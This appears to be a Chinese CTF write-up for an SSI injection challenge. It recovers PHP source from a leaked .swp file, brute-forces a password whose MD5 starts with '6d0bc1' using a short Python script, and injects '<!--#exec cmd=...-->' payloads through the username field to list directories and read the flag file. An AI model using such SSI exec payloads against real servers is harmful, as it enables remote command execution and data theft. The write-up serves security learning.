知识点:
1.ssi注入漏洞
2.脚本编写
解题过程
1.进入页面后扫描后台
发现index.php.swp文件,进入后发现源码
<?php
ob_start();
function get_hash(){
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
$content = uniqid().$random;
return sha1($content);
}
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {
echo "<script>alert('[+] Welcome to manage system')</script>";
$file_shtml = "public/".get_hash().".shtml";
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
fclose($shtml);
***
echo "[!] Header error ...";
} else {
echo "<script>alert('[!] Failed')</script>";
}else
{
***
}
***
?>
代码审计发现MD5加密后密码的前六位要等于6d0bc1
if(isset($_POST['username']) and $_POST['username'] != '' )
{
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {
echo "<script>alert('[+] Welcome to manage system')
自己写一段小脚本来找出符合此类型的密码
脚本:
import hashlib
for i in range(10000000):
a = hashlib.md5(str(i).encode('utf-8')).hexdigest()
if a[0:6] == '6d0bc1':
print(i)
print(a)
找出三个密码:2020666 2305004 9162671
随意用哪个登录
成功登录
这个页面抓包
发现隐藏url且后缀是.shtml
猜测是ssi注入
注入点在username
payload:
<!--#exec cmd="ls ../" -->
<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2" -->
访问对应的这个
public/ae8db9084a02ff8ba0b0be6ad6200aa072c3f88d.shtml
拿到flag